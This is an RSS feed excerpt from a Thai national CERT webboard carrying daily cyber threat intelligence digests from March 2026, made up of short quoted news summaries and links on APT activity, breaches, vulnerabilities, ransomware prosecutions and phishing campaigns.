<a href="https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/</a></p>
</li>
<li>
<p dir="auto"><strong>Wikipedia Hit By Self-Propagating JavaScript Worm That Vandalized Pages</strong><br />
"The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis. Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages. Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes."<br />
<a href="https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/</a></p>
</li>
<li>
<p dir="auto"><strong>APT36: A Nightmare Of Vibeware</strong><br />
"Pakistan-based threat actor APT36, also known as Transparent Tribe, has pivoted from off-the-shelf malware to "vibeware", an AI-driven development model that produces a high-volume, mediocre mass of implants. Using niche languages like Nim, Zig, and Crystal, the actor seeks to evade standard detection engines while leveraging trusted cloud services, including Slack, Discord, Supabase, and Google Sheets, for command and control."<br />
<a href="https://businessinsights.bitdefender.com/apt36-nightmare-vibeware" target="_blank" rel="noopener noreferrer nofollow ugc">https://businessinsights.bitdefender.com/apt36-nightmare-vibeware</a><br />
<a href="https://www.darkreading.com/cyberattacks-data-breaches/nation-state-actor-ai-malware-assembly-line" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/cyberattacks-data-breaches/nation-state-actor-ai-malware-assembly-line</a><br />
<a href="https://www.bankinfosecurity.com/nation-state-hackers-play-vibes-a-30920" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/nation-state-hackers-play-vibes-a-30920</a><br />
<a href="https://hackread.com/pakistan-apt36-indian-govt-networks-ai-vibeware/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/pakistan-apt36-indian-govt-networks-ai-vibeware/</a></p>
</li>
<li>
<p dir="auto"><strong>Seedworm: Iranian APT On Networks Of U.S. Bank, Airport, Software Company</strong><br />
"The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region. A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity."<br />
<a href="https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us</a><br />
<a href="https://www.theregister.com/2026/03/05/mudywater_backdoor_us_networks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/05/mudywater_backdoor_us_networks/</a></p>
</li>
<li>
<p dir="auto"><strong>FBI Targeted With ‘suspicious’ Activity On Its Networks</strong><br />
"The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details. “The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”"<br />
<a href="https://cyberscoop.com/fbi-targeted-with-suspicious-activity-on-its-networks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyberscoop.com/fbi-targeted-with-suspicious-activity-on-its-networks/</a></p>
</li>
<li>
<p dir="auto"><strong>LIMINAL PANDA: China’s Emerging Espionage Threat In The Semiconductor And Technology Sectors</strong><br />
"LIMINAL PANDA, a suspected China-nexus cyber-espionage actor, has recently emerged as an active player in the global threat landscape. The group began operating around 2020 and has focused its intelligence collection on a range of high-value targets in East Asia, Southeast Asia, and Western nations engaged in research and development of advanced technologies, including semiconductors, defense technologies, and telecommunications. While not a well-known actor (yet) like APT41 or Mustang Panda, LIMINAL PANDA shows an accelerating trajectory of evolution in capabilities, experimenting with the convergence of more traditional phishing criminal enterprises with sophisticated cloud exploitation and supply chain compromise."<br />
<a href="https://brandefense.io/blog/liminal-panda-apt-group/" target="_blank" rel="noopener noreferrer nofollow ugc">https://brandefense.io/blog/liminal-panda-apt-group/</a></p>
</li>
</ul>
<p dir="auto"><strong>Breaches/Hacks/Leaks</strong></p>
<ul>
<li>
<p dir="auto"><strong>New Jersey County Says Malware Attack Took Down Phone Lines, IT Systems</strong><br />
"One of the largest counties in New Jersey is dealing with a cyberattack that disrupted the phone lines and IT systems used across government offices. Passaic County, home to nearly 600,000 people in Northern New Jersey, published a statement on Wednesday evening warning residents that it is aware of a “malware attack” affecting county IT systems and phone lines. “Our team is actively working with federal and state officials to investigate and contain the issue,” the county said."<br />
<a href="https://therecord.media/new-jersey-county-says-malware-attack-took-down-phones" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/new-jersey-county-says-malware-attack-took-down-phones</a></p>
</li>
</ul>
<p dir="auto"><strong>General News</strong></p>
<ul>
<li><strong>Phobos Ransomware Admin Pleads Guilty To Wire Fraud Conspiracy</strong><br />
"A Russian national pleaded guilty to a wire fraud conspiracy charge related to his role in administering the Phobos ransomware operation, which breached hundreds of victims worldwide. Phobos is a long-running ransomware-as-a-service (RaaS) operation linked to the Crysis ransomware family. Phobos has been widely distributed through many affiliates, accounting for roughly 11% of all submissions to the ID Ransomware service between May 2024 and November 2024. The U.S. Department of Justice says the ransomware gang has collected ransom payments worth more than $39 million million from over 1,000 public and private entities worldwide."<br />
<a href="https://www.bleepingcomputer.com/news/security/phobos-ransomware-admin-pleads-guilty-to-wire-fraud-conspiracy/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/phobos-ransomware-admin-pleads-guilty-to-wire-fraud-conspiracy/</a><br />
<a href="https://therecord.media/phobos-ransomware-leader-facing-20-years" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/phobos-ransomware-leader-facing-20-years</a><br />
<a href="https://www.securityweek.com/russian-ransomware-operator-pleads-guilty-in-us/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/russian-ransomware-operator-pleads-guilty-in-us/</a><br />
<a href="https://cyberscoop.com/phobos-ransomware-leader-guilty/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyberscoop.com/phobos-ransomware-leader-guilty/</a><br />
<a href="https://securityaffairs.com/188984/security/phobos-ransomware-admin-faces-up-to-20-years-after-guilty-plea.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/188984/security/phobos-ransomware-admin-faces-up-to-20-years-after-guilty-plea.html</a></li>
<li><strong>LatAm Now Faces 2x More Cyberattacks Than US</strong><br />
"Nowhere in the world has cyber threat activity been growing faster than in Latin America, thanks in part to relatively rapid digital adoption on the part of businesses in the region, combined with relatively stagnant cybersecurity growth. Last year, researchers at Check Point tracked a 53% year-over-year rise in weekly cyberattacks in Latin America, and as of 2026, they confirmed it to be the most heavily targeted region on the planet."<br />
<a href="https://www.darkreading.com/threat-intelligence/latam-2x-more-cyberattacks-us" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/threat-intelligence/latam-2x-more-cyberattacks-us</a></li>
<li><strong>That Attractive Online Ad Might Be a Malware Trap</strong><br />
"Malware increasingly travels through the infrastructure that delivers online advertising. The Media Trust’s Global Report on Digital Trust, Ad Integrity, and the Protection of People describes a digital ad ecosystem where scam campaigns, malicious redirects, and malware delivery appear alongside marketing traffic. The financial impact of these threats continues to grow. Estimated consumer and business losses in the United States tied to malware, scams, and ad-borne fraud exceeded $12.5 billion in 2025. Exposure also remains widespread among internet users. Seven in ten adults reported encountering a digital scam or phishing attempt during the previous 12 months."<br />
<a href="https://www.helpnetsecurity.com/2026/03/05/the-media-trust-ad-malware-risks-report/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/05/the-media-trust-ad-malware-risks-report/</a></li>
<li><strong>As AI Agents Start Making Purchases, Security Teams Must Rethink Risk</strong><br />
"In this Help Net Security interview, Donald Kossmann, CTO at fintech company Chargebacks911, talks about the emerging security, fraud, and governance risks of “agentic commerce,” where AI agents can autonomously make purchasing decisions on behalf of users or organizations. He explains that as AI agents gain the ability to shop, negotiate prices, select suppliers, and execute transactions independently, traditional assumptions about digital commerce begin to break down."<br />
<a href="https://www.helpnetsecurity.com/2026/03/05/donald-kossmann-chargebacks911-agentic-commerce-security-risks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/05/donald-kossmann-chargebacks911-agentic-commerce-security-risks/</a></li>
<li><strong>Look What You Made Us Patch: 2025 Zero-Days In Review</strong><br />
"Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025. Although that volume of zero-days is lower than the record high observed in 2023 (100), it is higher than 2024’s count (78) and remained within the 60–100 range established over the previous four years, indicating a trend toward stabilization at these levels."<br />
<a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review" target="_blank" rel="noopener noreferrer nofollow ugc">https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review</a><br />
<a href="https://www.bleepingcomputer.com/news/security/google-says-90-zero-days-were-exploited-in-attacks-last-year/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/google-says-90-zero-days-were-exploited-in-attacks-last-year/</a><br />
<a href="https://therecord.media/google-says-90-zero-days-exploited-apt-spyware-vendors" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/google-says-90-zero-days-exploited-apt-spyware-vendors</a><br />
<a href="https://www.securityweek.com/google-half-of-2025s-90-exploited-zero-days-aimed-at-enterprises/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/google-half-of-2025s-90-exploited-zero-days-aimed-at-enterprises/</a><br />
<a href="https://www.theregister.com/2026/03/05/zero_day_attacks_enterprise_tech_record/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/05/zero_day_attacks_enterprise_tech_record/</a></li>
<li><strong>2026 Browser Data Reveals Major Enterprise Security Blind Spots</strong><br />
"The 2026 State of Browser Security Report is now available, revealing how the browser has rapidly become the most critical and least protected control point in the enterprise. It also highlights 2025 as the tipping point when AI-native browsers shifted from experimental tools to mainstream business platforms. Over the past twelve months, the browser evolved from a gateway to SaaS into something far more powerful and far more complex. AI copilots became embedded directly into business applications. Standalone generative AI tools became daily work companions. And a new class of AI-enhanced browsers began reshaping how users search, summarize, write, code, and automate tasks."<br />
<a href="https://www.bleepingcomputer.com/news/security/2026-browser-data-reveals-major-enterprise-security-blind-spots/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/2026-browser-data-reveals-major-enterprise-security-blind-spots/</a></li>
<li><strong>62 People Indicted By Taiwanese Prosecutors Over Ties To Cyber Scam Company Prince Group</strong><br />
"Prosecutors in Taipei indicted 62 people and 13 companies for their involvement in cyber scam operations organized throughout Asia by the Prince Group. The Taipei District Prosecutors Office initiated its investigation in October after Chen Zhi, the founder of the Prince Group, was indicted by U.S. prosecutors on money laundering charges."<br />
<a href="https://therecord.media/62-indicted-taiwan-prince-group-scams" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/62-indicted-taiwan-prince-group-scams</a></li>
<li><strong>AI-Driven Insider Risk Now a “Critical Business Threat,” Report Warns</strong><br />
"The risk of insider threats is on the rise and businesses are concerned about the cybersecurity implications of intentionally malicious or negligent employees, research by Mimecast has warned. According to the company’s State of Human Risk Report 2026, internal cybersecurity risk has grown across the board, to the extent that it should be treated as a “critical business threat.” In many cases, the additional insider risk is because of employees mishandling or actively abusing AI tools"<br />
<a href="https://www.infosecurity-magazine.com/news/ai-insider-risk-critical-business/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/ai-insider-risk-critical-business/</a></li>
</ul>
<p dir="auto"><strong>อ้างอิง</strong><br />
Electronic Transactions Development Agency (ETDA) <img src="/assets/uploads/files/1773029410535-7e9f3751-2cc2-4253-ad15-f3fd6806c953-image.png" alt="7e9f3751-2cc2-4253-ad15-f3fd6806c953-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2677/cyber-threat-intelligence-06-march-2026</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2677/cyber-threat-intelligence-06-march-2026</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Mon, 09 Mar 2026 04:04:01 GMT</pubDate></item><item><title><![CDATA[Drone Attack On AWS Data Center In The Middle East Widely Disrupts Cloud Services]]></title><description><![CDATA[<p dir="auto"><img src="/assets/uploads/files/1772701146088-9c4930b2-08b0-4329-8380-1c6dbfb964cb-image.png" alt="9c4930b2-08b0-4329-8380-1c6dbfb964cb-image.png" class=" img-fluid img-markdown" /> <img src="/assets/uploads/files/1772701152117-%E0%B9%82%E0%B8%94%E0%B8%A3%E0%B8%99%E0%B9%82%E0%B8%88%E0%B8%A1%E0%B8%95-%E0%B8%A8-%E0%B8%99%E0%B8%A2-%E0%B8%82-%E0%B8%AD%E0%B8%A1-%E0%B8%A5-aws-%E0%B9%83%E0%B8%99%E0%B8%95%E0%B8%B0%E0%B8%A7-%E0%B8%99%E0%B8%AD%E0%B8%AD%E0%B8%81%E0%B8%81%E0%B8%A5%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A3%E0%B8%B0%E0%B8%97.png" alt="โดรนโจมตีศูนย์ข้อมูล AWS ในตะวันออกกลางกระท.png" class=" img-fluid img-markdown" /></p>
<p dir="auto"><strong>สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand</strong>  <img src="/assets/uploads/files/1772701166467-87c733d2-a6cf-4168-87d4-865392fa8602-image.png" alt="87c733d2-a6cf-4168-87d4-865392fa8602-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2676/โดรนโจมต-ศ-นย-ข-อม-ล-aws-ในตะว-นออกกลางกระทบบร-การคลาวด-เป-นวงกว-าง</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2676/โดรนโจมต-ศ-นย-ข-อม-ล-aws-ในตะว-นออกกลางกระทบบร-การคลาวด-เป-นวงกว-าง</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 05 Mar 2026 08:59:28 GMT</pubDate></item><item><title><![CDATA[Microsoft Warns Of Phishing Campaign Abusing OAuth Redirects To Deceive Users And Distribute Malware]]></title><description><![CDATA[<p dir="auto"><img src="/assets/uploads/files/1772701102467-3652ea86-2acd-43d6-b8cc-e0c2e960d981-image.png" alt="3652ea86-2acd-43d6-b8cc-e0c2e960d981-image.png" class=" img-fluid img-markdown" /></p>
<p dir="auto"><img src="/assets/uploads/files/1772701109735-microsoft-%E0%B9%80%E0%B8%95-%E0%B8%AD%E0%B8%99%E0%B9%81%E0%B8%84%E0%B8%A1%E0%B9%80%E0%B8%9B%E0%B8%8D%E0%B8%9F-%E0%B8%8A%E0%B8%8A-%E0%B8%87%E0%B9%83%E0%B8%8A-%E0%B8%8A-%E0%B8%AD%E0%B8%87%E0%B8%97%E0%B8%B2%E0%B8%87-oauth-redirect-%E0%B8%AB%E0%B8%A5%E0%B8%AD%E0%B8%81.png" alt="Microsoft เตือนแคมเปญฟิชชิงใช้ช่องทาง OAuth Redirect หลอก.png" class=" img-fluid img-markdown" /></p>
<p dir="auto"><strong>สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand</strong> <img src="/assets/uploads/files/1772701129672-12054ae6-af64-4ecf-8047-4c573cc9338b-image.png" alt="12054ae6-af64-4ecf-8047-4c573cc9338b-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2675/microsoft-เต-อนแคมเปญฟ-ชช-งใช-ช-องทาง-oauth-redirect-หลอกผ-ใช-และกระจายม-ลแวร</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2675/microsoft-เต-อนแคมเปญฟ-ชช-งใช-ช-องทาง-oauth-redirect-หลอกผ-ใช-และกระจายม-ลแวร</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 05 Mar 2026 08:58:54 GMT</pubDate></item><item><title><![CDATA[CISA Warns Of High-Severity VMware Aria Operations Vulnerability Reported As Exploited In The Wild]]></title><description><![CDATA[<p dir="auto"><img src="/assets/uploads/files/1772701024596-7f7804b7-4564-4529-82ee-83e9ad3e6582-image.png" alt="7f7804b7-4564-4529-82ee-83e9ad3e6582-image.png" class=" img-fluid img-markdown" /> <img src="/assets/uploads/files/1772701067590-cisa-%E0%B9%80%E0%B8%95-%E0%B8%AD%E0%B8%99%E0%B8%A0-%E0%B8%A2%E0%B8%8A-%E0%B8%AD%E0%B8%87%E0%B9%82%E0%B8%AB%E0%B8%A7-%E0%B8%A3%E0%B8%B0%E0%B8%94-%E0%B8%9A%E0%B8%AA-%E0%B8%87%E0%B8%9A%E0%B8%99-vmware-aria-operations-%E0%B8%9E%E0%B8%9A%E0%B8%A3%E0%B8%B2.png" alt="CISA เตือนภัยช่องโหว่ระดับสูงบน VMware Aria Operations พบรา.png" class=" img-fluid img-markdown" /></p>
<p dir="auto"><strong>สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand</strong>  <img src="/assets/uploads/files/1772701089154-bb0217d8-4a52-4bef-a62d-452c3abba150-image.png" alt="bb0217d8-4a52-4bef-a62d-452c3abba150-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2674/cisa-เต-อนภ-ยช-องโหว-ระด-บส-งบน-vmware-aria-operations-พบรายงานการถ-กนำไปใช-โจมต-จร-งแล-ว</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2674/cisa-เต-อนภ-ยช-องโหว-ระด-บส-งบน-vmware-aria-operations-พบรายงานการถ-กนำไปใช-โจมต-จร-งแล-ว</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 05 Mar 2026 08:58:11 GMT</pubDate></item><item><title><![CDATA[Cyber Threat Intelligence 05 March 2026]]></title><description><![CDATA[<p dir="auto"><strong>Industrial Sector</strong></p>
<ul>
<li><strong>Cybersecurity Is Now The Price Of Admission For Industrial AI</strong><br />
"Industrial organizations are accelerating AI deployment across manufacturing, utilities, and transportation and running straight into a security problem. Cisco’s 2026 State of Industrial AI Report, based on responses from more than 1,000 decision-makers across 19 countries, finds that cybersecurity has become the single largest obstacle to AI adoption, outranking skills gaps, integration challenges, and budget constraints. The shift is notable. In 2024, cybersecurity ranked third among external growth obstacles. By 2026, 40% of respondents cite it as a top barrier to AI adoption specifically, and 48% name it as their biggest networking challenge overall. The rise reflects the reality that connecting more assets and systems to support AI expands the attack surface in ways that traditional security approaches were not designed to handle."<br />
<a href="https://www.helpnetsecurity.com/2026/03/04/cisco-industrial-ai-cybersecurity/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/04/cisco-industrial-ai-cybersecurity/</a></li>
</ul>
<p dir="auto"><strong>New Tooling</strong></p>
<ul>
<li><strong>Mquire: Open-Source Linux Memory Forensics Tool</strong><br />
"Linux memory forensics has long depended on debug symbols tied to specific kernel versions. These symbols are not installed on production systems by default, and sourcing them from external repositories creates a recurring problem: repositories go stale, kernel builds diverge, and analysts working incident response often find no published symbols for the exact kernel they need to examine. Trail of Bits published mquire to address this constraint. The open-source tool analyzes Linux memory dumps without requiring any external debug information."<br />
<a href="https://www.helpnetsecurity.com/2026/03/04/mquire-open-source-linux-memory-forensics-tool/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/04/mquire-open-source-linux-memory-forensics-tool/</a><br />
<a href="https://github.com/trailofbits/mquire" target="_blank" rel="noopener noreferrer nofollow ugc">https://github.com/trailofbits/mquire</a></li>
</ul>
<p dir="auto"><strong>Vulnerabilities</strong></p>
<ul>
<li><strong>Cisco Warns Of Max Severity Secure FMC Flaws Giving Root Access</strong><br />
"Cisco has released security updates to patch two maximum-severity vulnerabilities in its Secure Firewall Management Center (FMC) software. Secure FMC is a web or SSH-based interface for admins to manage Cisco firewalls and configure application control, intrusion prevention, URL filtering, and advanced malware protection. Both vulnerabilities can be exploited remotely by unauthenticated attackers: the authentication bypass flaw (CVE-2026-20079) allows attackers to gain root access to the underlying operating system, while the remote code execution (RCE) vulnerability (CVE-2026-20131) lets them execute arbitrary Java code as root on unpatched devices."<br />
<a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-max-severity-secure-fmc-flaws-giving-root-access/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/cisco-warns-of-max-severity-secure-fmc-flaws-giving-root-access/</a><br />
<a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2" target="_blank" rel="noopener noreferrer nofollow ugc">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2</a><br />
<a href="https://securityaffairs.com/188921/security/cisco-fixes-maximum-severity-secure-fmc-bugs-threatening-firewall-security.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/188921/security/cisco-fixes-maximum-severity-secure-fmc-bugs-threatening-firewall-security.html</a></li>
<li><strong>Sometimes, You Can Just Feel The Security In The Design (Juniper Junos Evolved CVE-2026-21902 Pre-Auth RCE)</strong><br />
"On today’s ‘good news disguised as other things’ segment, we’re turning our gaze to CVE-2026-21902 - a recently disclosed “Incorrect Permission Assignment for Critical Resource” vulnerability affecting Juniper’s Junos OS Evolved platform. This vulnerability affects only Juniper’s PTX Series of devices, apparently."<br />
<a href="https://labs.watchtowr.com/sometimes-you-can-just-feel-the-security-in-the-design-junos-os-evolved-cve-2026-21902-rce/" target="_blank" rel="noopener noreferrer nofollow ugc">https://labs.watchtowr.com/sometimes-you-can-just-feel-the-security-in-the-design-junos-os-evolved-cve-2026-21902-rce/</a><br />
<a href="https://www.bankinfosecurity.com/juniper-ptx-routers-at-risk-critical-takeover-flaw-disclosed-a-30904" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/juniper-ptx-routers-at-risk-critical-takeover-flaw-disclosed-a-30904</a></li>
<li><strong>Mail2Shell – CVE-2026-28289: New Zero-Click RCE On FreeScout</strong><br />
"A few days ago, we published research detailing a FreeScout vulnerability that allowed authenticated attackers to achieve full system compromise via RCE – originally reported by <a href="http://Offensive.sa" target="_blank" rel="noopener noreferrer nofollow ugc">Offensive.sa</a>. On the same day, we discovered a patch bypass that allowed us to reproduce the same RCE on newly updated servers, demonstrating how quickly incomplete fixes can be circumvented. During our deeper analysis, we escalated the attack chain further — converting it into a Zero‑Click RCE. By sending a single crafted email to any address configured in FreeScout, an attacker can execute code on the server without authentication and without user interaction."<br />
<a href="https://www.ox.security/blog/freescout-rce-cve-2026-28289/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.ox.security/blog/freescout-rce-cve-2026-28289/</a><br />
<a href="https://www.bleepingcomputer.com/news/security/mail2shell-zero-click-attack-lets-hackers-hijack-freescout-mail-servers/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/mail2shell-zero-click-attack-lets-hackers-hijack-freescout-mail-servers/</a><br />
<a href="https://www.securityweek.com/critical-freescout-vulnerability-leads-to-full-server-compromise/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/critical-freescout-vulnerability-leads-to-full-server-compromise/</a></li>
<li><strong>Over 1,200 IceWarp Servers Still Vulnerable To Unauthenticated RCE Flaw (CVE-2025-14500)</strong><br />
"A critical RCE vulnerability (CVE-2025-14500) in IceWarp, an EU-made business communication and collaboration platform, may be exploited by attackers to gain unauthorized access to exposed unpatched servers. According to the Shadowserver Foundation, there are currently over 1,200 internet-facing instances that have yet to receive a fix, and the organization is sending out alerts to the owners, urging them to update."<br />
<a href="https://www.helpnetsecurity.com/2026/03/04/icewarp-rce-cve-2025-14500/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/04/icewarp-rce-cve-2025-14500/</a></li>
</ul>
<p dir="auto"><strong>Malware</strong></p>
<ul>
<li><strong>Fake LastPass Support Email Threads Try To Steal Vault Passwords</strong><br />
"Password management software provider LastPass is warning users of a phishing campaign targeting its users with fake unauthorized account access alerts. The emails impersonate a LastPass representative by spoofing the display name and use subject lines crafted to mimic forwarded internal conversations between attackers and the company’s customer support team about a request to change the account’s primary email address. The email chains are forwarded to the target in an attempt to prompt them to respond to the suspicious activity with urgency and click on links named “report suspicious activity,” “disconnect and lock vault,” and “revoke device.”"<br />
<a href="https://www.bleepingcomputer.com/news/security/fake-lastpass-support-email-threads-try-to-steal-vault-passwords/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/fake-lastpass-support-email-threads-try-to-steal-vault-passwords/</a><br />
<a href="https://securityaffairs.com/188911/security/lastpass-warns-of-spoofed-alerts-aimed-at-stealing-master-passwords.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/188911/security/lastpass-warns-of-spoofed-alerts-aimed-at-stealing-master-passwords.html</a><br />
<a href="https://www.securityweek.com/lastpass-warns-of-new-phishing-campaign/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/lastpass-warns-of-new-phishing-campaign/</a></li>
<li><strong>Hacker Mass-Mails HungerRush Extortion Emails To Restaurant Patrons</strong><br />
"Customers of restaurants using the HungerRush point-of-sale (POS) platform say they received emails from a threat actor attempting to extort the company, warning that restaurant and customer data could be exposed if HungerRush fails to respond. HungerRush is a restaurant technology provider that offers point-of-sale (POS), online ordering, delivery management, and payment processing software to help restaurants manage orders, customer information, and business operations. The company claims to work with over 16,000 restaurants, including Sbarro, Jet's Pizza, Fajita Pete's, Hungry Howie's, and many more."<br />
<a href="https://www.bleepingcomputer.com/news/security/hacker-mass-mails-hungerrush-extortion-emails-to-restaurant-patrons/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/hacker-mass-mails-hungerrush-extortion-emails-to-restaurant-patrons/</a></li>
<li><strong>How a Brute Force Attack Unmasked a Ransomware Infrastructure Network</strong><br />
"To most defenders, another brute-force alert on exposed RDP is background noise — bread-and-butter activity you triage and move past. For the Huntress Tactical Response Team, one of those “routine” alerts turned into something very different. As we pulled on a single successful login, we uncovered unusual credential-hunting behavior, a web of geo-distributed infrastructure, and a shady VPN service that all pointed toward a ransomware-as-a-service ecosystem and its initial access brokers. This post walks through how a noisy brute-force campaign became our doorway into that operation."<br />
<a href="https://www.bleepingcomputer.com/news/security/how-a-brute-force-attack-unmasked-a-ransomware-infrastructure-network/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/how-a-brute-force-attack-unmasked-a-ransomware-infrastructure-network/</a></li>
<li><strong>Signed Malware Impersonating Workplace Apps Deploys RMM Backdoors</strong><br />
"In February 2026, Microsoft Defender Experts identified multiple phishing campaigns attributed to an unknown threat actor. The campaigns used workplace meeting lures, PDF attachments, and abuse of legitimate binaries to deliver signed malware. Phishing emails directed users to download malicious executables masquerading as legitimate software. The files were digitally signed using an Extended Validation (EV) certificate issued to TrustConnect Software PTY LTD. Once executed, the applications installed remote monitoring and management (RMM) tools that enabled the attacker to establish persistent access on compromised systems."<br />
<a href="https://www.microsoft.com/en-us/security/blog/2026/03/03/signed-malware-impersonating-workplace-apps-deploys-rmm-backdoors/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.microsoft.com/en-us/security/blog/2026/03/03/signed-malware-impersonating-workplace-apps-deploys-rmm-backdoors/</a><br />
<a href="https://hackread.com/fake-zoom-teams-invites-malware-certificates/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/fake-zoom-teams-invites-malware-certificates/</a></li>
<li><strong>Telegram As The New Operational Layer Of Cyber Threat Activity</strong><br />
"Telegram is no longer just a messaging application. It has evolved into a primary operational playground for modern threat actors. What underground forums on Tor once represented, Telegram now replicates — but faster, more scalable, and significantly more accessible. Over the past few years, elements of the cybercriminal ecosystem have progressively shifted away from traditional darknet marketplaces and closed forums toward Telegram’s hybrid architecture of public channels, private groups, and automated bots. The barriers that once required Tor access, reputation building, and escrow systems have been replaced with instant channel creation, subscription-based malware distribution, real-time broadcasting, and bot-enabled commerce."<br />
<a href="https://www.cyfirma.com/research/telegram-as-the-new-operational-layer-of-cyber-threat-activity/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cyfirma.com/research/telegram-as-the-new-operational-layer-of-cyber-threat-activity/</a><br />
<a href="https://hackread.com/telegram-used-sell-access-malware-stolen-logs/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/telegram-used-sell-access-malware-stolen-logs/</a></li>
<li><strong>Retaliatory Hacktivist DDoS Activity Following Operation Epic Fury/Roaring Lion</strong><br />
